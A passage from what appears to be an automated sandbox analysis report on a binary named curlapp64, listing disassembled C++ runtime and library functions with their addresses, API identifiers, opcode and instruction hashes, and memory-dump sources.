                                                                                                                                • Opcode Fuzzy Hash: a4ae477cd1e76dea8615bdd881bdf2b9848966a3ce02d94f99ccd202125ce3c7
                                                                                                                                • Instruction Fuzzy Hash: 82A1E262B086C246EB218F24A43037D76A1EF46796F4842F5DA9D877C4DF7DD494C380
                                                                                                                                Function 00007FF6CABE33E4 Relevance: 9.2, APIs: 6, Instructions: 206COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2494880260.00007FF6CABB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CABB0000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2494852809.00007FF6CABB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494921212.00007FF6CAC09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494965412.00007FF6CAC41000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494987758.00007FF6CAC45000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff6cabb0000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ByteCharMultiStringWide
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2829165498-0
                                                                                                                                • Opcode ID: 15a0a3d4e2dd200d7bd002b8eeaa938841076b27f4ed156a0dd1d76035cb24b4
                                                                                                                                • Instruction ID: 54d27736d9970e6f54d1fc8463d1c3023d4366297bdf3a1f47b344422c6bcb91
                                                                                                                                • Opcode Fuzzy Hash: 15a0a3d4e2dd200d7bd002b8eeaa938841076b27f4ed156a0dd1d76035cb24b4
                                                                                                                                • Instruction Fuzzy Hash: DB819072A0878286EB208F21F86036973E5FF457A9F5446B5EA9D87BD8EF3CD4058740
                                                                                                                                Function 00007FF6CABEA4C0 Relevance: 9.2, APIs: 6, Instructions: 156COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2494880260.00007FF6CABB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CABB0000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2494852809.00007FF6CABB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494921212.00007FF6CAC09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494965412.00007FF6CAC41000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494987758.00007FF6CAC45000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff6cabb0000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3215553584-0
                                                                                                                                • Opcode ID: fcc6ca6c3c979c9f973a8974cb8edb93fcef3ba0881d5024cae7a594c39b033d
                                                                                                                                • Instruction ID: c4601b41854c72e3a2e95f3fc93b97bf770a58fd67e0b6c6e696369b9eb805c8
                                                                                                                                • Opcode Fuzzy Hash: fcc6ca6c3c979c9f973a8974cb8edb93fcef3ba0881d5024cae7a594c39b033d
                                                                                                                                • Instruction Fuzzy Hash: 2551A57690C68A85E7529F25F07027D3BE4AF43B46F4880F9D6CC87386DE2D9445C382
                                                                                                                                Function 00007FF6CABB6760 Relevance: 9.1, APIs: 6, Instructions: 124COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2494880260.00007FF6CABB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CABB0000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2494852809.00007FF6CABB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494921212.00007FF6CAC09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494965412.00007FF6CAC41000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494987758.00007FF6CAC45000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff6cabb0000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_RegisterSetgloballocalestd::locale::_
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1858502957-0
                                                                                                                                • Opcode ID: 18d75542bb58cd4ede05d2349806faadd251bf666efbcb7077eeae8f896a1538
                                                                                                                                • Instruction ID: ce461dd8a6b6d0ad9659d20a245d8c3a2330ea11205145af28454691e7a746ae
                                                                                                                                • Opcode Fuzzy Hash: 18d75542bb58cd4ede05d2349806faadd251bf666efbcb7077eeae8f896a1538
                                                                                                                                • Instruction Fuzzy Hash: A441AF22A19A4281EA159F11F8B45B93BA0FF45B91F5406B2EEDD83395DF3CE856C340
                                                                                                                                Function 00007FF6CABBAFB0 Relevance: 9.1, APIs: 6, Instructions: 90COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2494880260.00007FF6CABB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CABB0000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2494852809.00007FF6CABB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494921212.00007FF6CAC09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494965412.00007FF6CAC41000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494987758.00007FF6CAC45000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff6cabb0000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2081738530-0
                                                                                                                                • Opcode ID: 4ff97662dace67d27204c207221ef1c788e69578d639497f0a6820352d3adf17
                                                                                                                                • Instruction ID: e88e882cc4099c9f81636f7f97c8f7f251a902254bc55d872d52074bbcd5c8e2
                                                                                                                                • Opcode Fuzzy Hash: 4ff97662dace67d27204c207221ef1c788e69578d639497f0a6820352d3adf17
                                                                                                                                • Instruction Fuzzy Hash: A331AE22A08E0285EA24DF15F5A06B97770FF49B95F5842B2DBED833A5DE3CE441C740
                                                                                                                                Function 00007FF6CABB93C0 Relevance: 9.1, APIs: 6, Instructions: 90COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2494880260.00007FF6CABB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CABB0000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2494852809.00007FF6CABB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494921212.00007FF6CAC09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494965412.00007FF6CAC41000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494987758.00007FF6CAC45000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff6cabb0000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2081738530-0
                                                                                                                                • Opcode ID: 6d4b3a52c4b12448916403d88c508dc28976cb80c7b7da730723599f30e9cb9d
                                                                                                                                • Instruction ID: 7d8db7484f1c59b4543180dd28322efa5e69b494a667649c59f89c91f6b4a119
                                                                                                                                • Opcode Fuzzy Hash: 6d4b3a52c4b12448916403d88c508dc28976cb80c7b7da730723599f30e9cb9d
                                                                                                                                • Instruction Fuzzy Hash: 3D318022A08B4285EA25DF55F4A11B97770FF89BA5F4802B1DADE833A5DF3CE441C740
                                                                                                                                Function 00007FF6CABE6E80 Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 320COMMONLIBRARYCODE
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2494880260.00007FF6CABB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CABB0000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2494852809.00007FF6CABB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494921212.00007FF6CAC09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494965412.00007FF6CAC41000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494987758.00007FF6CAC45000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff6cabb0000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Is_bad_exception_allowedstd::bad_alloc::bad_alloc
                                                                                                                                • String ID: csm$csm$csm
                                                                                                                                • API String ID: 3523768491-393685449
                                                                                                                                • Opcode ID: aac434d52fbaaa1f9ad8c2f7d5d4873a533c8f2939eead5de051d543cd90492c
                                                                                                                                • Instruction ID: 0e982617564cd58c90ac4cd8bcf369836e945718d295a9bcd3ae19c5e4baef88
                                                                                                                                • Opcode Fuzzy Hash: aac434d52fbaaa1f9ad8c2f7d5d4873a533c8f2939eead5de051d543cd90492c
                                                                                                                                • Instruction Fuzzy Hash: 66E1C3729087828AE760DF34E4A43AD37A0FB46749F1442B6DECD97A56DF38E481C780
                                                                                                                                Function 00007FF6CABF5E70 Relevance: 9.1, APIs: 6, Instructions: 51COMMONLIBRARYCODE
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • GetLastError.KERNEL32 ref: 00007FF6CABF5E7F
                                                                                                                                • SetLastError.KERNEL32 ref: 00007FF6CABF5E9E
                                                                                                                                • FlsSetValue.KERNEL32 ref: 00007FF6CABF5EC7
                                                                                                                                • FlsSetValue.KERNEL32 ref: 00007FF6CABF5ED8
                                                                                                                                • FlsSetValue.KERNEL32 ref: 00007FF6CABF5EE9
                                                                                                                                  • Part of subcall function 00007FF6CABF74F0: HeapFree.KERNEL32(?,?,00007FF6CABF5363,00007FF6CABFF382,?,?,?,00007FF6CABFF6FF,?,?,00000000,00007FF6CABFFC79,?,?,?,00007FF6CABFFBAB), ref: 00007FF6CABF7506
                                                                                                                                  • Part of subcall function 00007FF6CABF74F0: GetLastError.KERNEL32(?,?,00007FF6CABF5363,00007FF6CABFF382,?,?,?,00007FF6CABFF6FF,?,?,00000000,00007FF6CABFFC79,?,?,?,00007FF6CABFFBAB), ref: 00007FF6CABF7510
                                                                                                                                • SetLastError.KERNEL32 ref: 00007FF6CABF5F0C
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2494880260.00007FF6CABB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CABB0000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2494852809.00007FF6CABB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494921212.00007FF6CAC09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494965412.00007FF6CAC41000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494987758.00007FF6CAC45000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff6cabb0000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ErrorLast$Value$FreeHeap
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 365477584-0
                                                                                                                                • Opcode ID: b9c899493dd6f9e1b3cd70cccc378b2c33b4d53d64c6751ca88f2c12dc2448d5
                                                                                                                                • Instruction ID: e211880339194bf3c71c61a04a2aafb2273b78ca9e1f9a87aba765435b90ccf5
                                                                                                                                • Opcode Fuzzy Hash: b9c899493dd6f9e1b3cd70cccc378b2c33b4d53d64c6751ca88f2c12dc2448d5
                                                                                                                                • Instruction Fuzzy Hash: E6118E7DA0829241F604AF757C310BD12516F8A7A2F4846F8E9AEC6ACACE2CE8415300
                                                                                                                                Function 00007FF6CABB1D30 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 124COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2494880260.00007FF6CABB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CABB0000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2494852809.00007FF6CABB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494921212.00007FF6CAC09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494965412.00007FF6CAC41000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494987758.00007FF6CAC45000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff6cabb0000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: __std_exception_copy_invalid_parameter_noinfo_noreturn
                                                                                                                                • String ID: ios_base::failbit set
                                                                                                                                • API String ID: 1109970293-3924258884
                                                                                                                                • Opcode ID: 890ea59beb20f34ae2b6416092b2e74fee24d137ec1d7c672ed5399698c4e44a
                                                                                                                                • Instruction ID: 6b902b1a2c2ab02cf070d92a9a13ec06b65715b02f76895be8af39295e1fb48c
                                                                                                                                • Opcode Fuzzy Hash: 890ea59beb20f34ae2b6416092b2e74fee24d137ec1d7c672ed5399698c4e44a
                                                                                                                                • Instruction Fuzzy Hash: EA519262E18BC580EA108F24F4A13A97360FB9A795F409371E7EC827A5EF7CE194C340
                                                                                                                                Function 00007FF6CABB1A20 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 115COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2494880260.00007FF6CABB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CABB0000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2494852809.00007FF6CABB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494921212.00007FF6CAC09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494965412.00007FF6CAC41000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494987758.00007FF6CAC45000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff6cabb0000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: std::_$Lockit$GetctypeLocinfo::_Locinfo_ctorLockit::_Lockit::~_
                                                                                                                                • String ID: bad locale name
                                                                                                                                • API String ID: 2967684691-1405518554
                                                                                                                                • Opcode ID: 36c21e983f29bd10273b36af1d2549a688b365a80dab9db7502aa811d3725e5c
                                                                                                                                • Instruction ID: 6962a823c42a4ee0e96719b05d9da19b47b8f7162ec1aa1d6835a2ab41f43729
                                                                                                                                • Opcode Fuzzy Hash: 36c21e983f29bd10273b36af1d2549a688b365a80dab9db7502aa811d3725e5c
                                                                                                                                • Instruction Fuzzy Hash: 54416E26B0AB4189FB24DFB0F8A02BC3374AF45745F0841B9DE8DA6A55EF38D526D340
                                                                                                                                Function 00007FF6CABD749B Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 77COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2494880260.00007FF6CABB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CABB0000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2494852809.00007FF6CABB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494921212.00007FF6CAC09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494965412.00007FF6CAC41000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494987758.00007FF6CAC45000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff6cabb0000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Xinvalid_argumentstd::_
                                                                                                                                • String ID: Negative width.$Number is too big.
                                                                                                                                • API String ID: 909987262-1861685508
                                                                                                                                • Opcode ID: 320735af1e8252cf155c051fe62f8adae52c5b50b9df1efdcb582bcfec092ecf
                                                                                                                                • Instruction ID: e014b394c6e38e0428110e0b38f542aa1d078f5ca3453f6787d718fe7971632e
                                                                                                                                • Opcode Fuzzy Hash: 320735af1e8252cf155c051fe62f8adae52c5b50b9df1efdcb582bcfec092ecf
                                                                                                                                • Instruction Fuzzy Hash: 87111A62C0C1874EF1496E7824390FD2E509F5371AF984EF5D7ED82ADFAC0C6882C582
                                                                                                                                Function 00007FF6CABD7570 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 76COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2494880260.00007FF6CABB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CABB0000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2494852809.00007FF6CABB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494921212.00007FF6CAC09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494965412.00007FF6CAC41000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494987758.00007FF6CAC45000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff6cabb0000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Xinvalid_argumentstd::_$_invalid_parameter_noinfo_noreturn
                                                                                                                                • String ID: Negative precision.$Number is too big.
                                                                                                                                • API String ID: 3237623162-3993994484
                                                                                                                                • Opcode ID: 967a7eb5fad877dfc14cd9993c307950e699535fff711e18bd837ab3ad44be39
                                                                                                                                • Instruction ID: c91cdc767f49b4d357b4cb39ae74440e21a92141d9f7228a143dbf11cdaad1ca
                                                                                                                                • Opcode Fuzzy Hash: 967a7eb5fad877dfc14cd9993c307950e699535fff711e18bd837ab3ad44be39
                                                                                                                                • Instruction Fuzzy Hash: 33212A42C0D2874AF25A6F6874790FD2E908F63746F9448F6C3E9829CFFD0D6494C250
                                                                                                                                Function 00007FF6CABD75BB Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 68COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2494880260.00007FF6CABB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CABB0000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2494852809.00007FF6CABB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494921212.00007FF6CAC09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494965412.00007FF6CAC41000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494987758.00007FF6CAC45000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff6cabb0000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Xinvalid_argumentstd::_
                                                                                                                                • String ID: Negative precision.$Number is too big.
                                                                                                                                • API String ID: 909987262-3993994484
                                                                                                                                • Opcode ID: 7d10e49bc5bcaf14ebf0dcbc836d0ecaa3bbe8ecc51578ee1f01ed474e94e3d0
                                                                                                                                • Instruction ID: 218fb1234c2e19aff4988caf8a933d7e60401110d25f147d0c6a98d7843db990
                                                                                                                                • Opcode Fuzzy Hash: 7d10e49bc5bcaf14ebf0dcbc836d0ecaa3bbe8ecc51578ee1f01ed474e94e3d0
                                                                                                                                • Instruction Fuzzy Hash: 22210742D0E1874EF66A6FA834791FD2E508F63746F9449F6D3E982ACBBC0D6484C251
                                                                                                                                Function 00007FF6CABF36A0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 26libraryloaderCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2494880260.00007FF6CABB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CABB0000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2494852809.00007FF6CABB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494921212.00007FF6CAC09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494965412.00007FF6CAC41000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494987758.00007FF6CAC45000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff6cabb0000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                • String ID: CorExitProcess$mscoree.dll
                                                                                                                                • API String ID: 4061214504-1276376045
                                                                                                                                • Opcode ID: 103c69a73d494ed9b20f0460c6a2aadfaadf16eb5d6eb8d5db165faae30ffdac
                                                                                                                                • Instruction ID: 8792b69f3b4b17cc9f496801fd610c34c292ca5cee9eae600ac163321af9f2b8
                                                                                                                                • Opcode Fuzzy Hash: 103c69a73d494ed9b20f0460c6a2aadfaadf16eb5d6eb8d5db165faae30ffdac
                                                                                                                                • Instruction Fuzzy Hash: 73F06D65B0964681EA108F64F8A93792370AF89766F5813B8D6FEC52E4DF3DD089C600
                                                                                                                                Function 00007FF8BA241B30 Relevance: 7.8, APIs: 6, Instructions: 341COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • memmove.VCRUNTIME140(?,?,00000000,00000004,?,FFFFFFFF,?,00007FF8BA243249,?,?,?,?,00007FF8BA2414B7), ref: 00007FF8BA241C85
                                                                                                                                • memmove.VCRUNTIME140(?,?,00000000,00000004,?,FFFFFFFF,?,00007FF8BA243249,?,?,?,?,00007FF8BA2414B7), ref: 00007FF8BA241CCC
                                                                                                                                • memmove.VCRUNTIME140 ref: 00007FF8BA241D6B
                                                                                                                                • memmove.VCRUNTIME140(?,?,00000000,00000004,?,FFFFFFFF,?,00007FF8BA243249,?,?,?,?,00007FF8BA2414B7), ref: 00007FF8BA241D99
                                                                                                                                • memmove.VCRUNTIME140(?,?,00000000,00000004,?,FFFFFFFF,?,00007FF8BA243249,?,?,?,?,00007FF8BA2414B7), ref: 00007FF8BA241DD5
                                                                                                                                • memmove.VCRUNTIME140(?,?,00000000,00000004,?,FFFFFFFF,?,00007FF8BA243249,?,?,?,?,00007FF8BA2414B7), ref: 00007FF8BA241E9B
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2495227485.00007FF8BA241000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8BA240000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2495209271.00007FF8BA240000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495250453.00007FF8BA24F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495279165.00007FF8BA257000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff8ba240000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: memmove
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2162964266-0
                                                                                                                                • Opcode ID: 71a6b9977b4b69140f2b3d41bb47331e6d654a8c7b90b0a4bbef06fe735d726f
                                                                                                                                • Instruction ID: fc8b91033c88ba8ee2d7d2873126b8ee36bc530141295f9ad16b1019cbcb0846
                                                                                                                                • Opcode Fuzzy Hash: 71a6b9977b4b69140f2b3d41bb47331e6d654a8c7b90b0a4bbef06fe735d726f
                                                                                                                                • Instruction Fuzzy Hash: 2FE12633A046428AE714CE3DC1816AD37A2FB98F88F159176DF4E87758DF38E8419B91
                                                                                                                                Function 00007FF6CABE6280 Relevance: 7.8, APIs: 5, Instructions: 290COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2494880260.00007FF6CABB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CABB0000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2494852809.00007FF6CABB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494921212.00007FF6CAC09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494965412.00007FF6CAC41000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494987758.00007FF6CAC45000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff6cabb0000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: AdjustPointer
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1740715915-0
                                                                                                                                • Opcode ID: c75b2b37e7f9f3245c7695ee1cd3624bce5a4dc845d1edee6462a4982f2df9d4
                                                                                                                                • Instruction ID: 88b0148f990f30e48e3c26c087c571294cdd46025a55d126a59551a1f7731dde
                                                                                                                                • Opcode Fuzzy Hash: c75b2b37e7f9f3245c7695ee1cd3624bce5a4dc845d1edee6462a4982f2df9d4
                                                                                                                                • Instruction Fuzzy Hash: 77B1C321A0A64381EA658F15B1706BD63E4BF56B86F0984F5DECD87786DE3CEC528380
                                                                                                                                Function 00007FF8A935CA20 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 93COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2495037930.00007FF8A9301000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8A9300000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2495011901.00007FF8A9300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495090755.00007FF8A936B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495121747.00007FF8A9387000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495143588.00007FF8A9388000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495161592.00007FF8A9389000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495177927.00007FF8A938B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff8a9300000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: memmove$malloc
                                                                                                                                • String ID: PLAIN
                                                                                                                                • API String ID: 3263852767-4000620671
                                                                                                                                • Opcode ID: 851d310dda9a69e7314915aaa590fd7519827ca88e45cdb4a43789a41ee7b5de
                                                                                                                                • Instruction ID: 86b679ec4181faafc5394e58a41a19b6f74d1d04a7dbd2928b35e9c7d424edf4
                                                                                                                                • Opcode Fuzzy Hash: 851d310dda9a69e7314915aaa590fd7519827ca88e45cdb4a43789a41ee7b5de
